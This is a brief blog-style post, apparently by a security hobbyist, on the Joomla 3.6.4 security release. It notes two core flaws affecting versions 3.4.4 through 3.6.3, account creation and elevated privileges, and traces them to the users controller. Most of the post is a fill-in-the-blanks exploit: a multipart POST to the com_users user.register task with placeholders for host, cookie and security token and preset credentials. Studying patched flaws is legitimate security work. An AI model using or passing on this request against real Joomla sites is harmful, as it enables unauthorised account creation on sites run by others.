Yesterday Joomla published version 3.6.4, an update to patch security issues: - High Priority — Core — Account Creation (affecting Joomla! 3.4.4 through 3.6.3) More information - High Priority — Core — Elevated Privileges (affecting Joomla! 3.4.4 through 3.6.3) More information Because I was curious to see how these vulnerabilies worked I decided to check out the patch and write an exploit. By looking at the changes, the issue had to be in the components/com_users/controllers/user.php file. EXPLOIT ========================================================= POST /index.php?option=com_users&task=user.register HTTP/1.1 Host: [INSERT_HOST] Referer: [INSERT_HOST]/index.php/component/users/?view=registration Cookie: [INSERT_COOKIE] Connection: close ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[name]" hackers ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[username]" hackers ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[password1]" password ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[password2]" password ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[email1]" email@example.com ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="user[email2]" email@example.com ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="option" com_users ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="task" user.register ------WebKitFormBoundarydPTNyMPMzmAhBsf4 Content-Disposition: form-data; name="[INSERT_SECURITY_TOKEN]" 1 ------WebKitFormBoundarydPTNyMPMzmAhBsf4-- =========================================================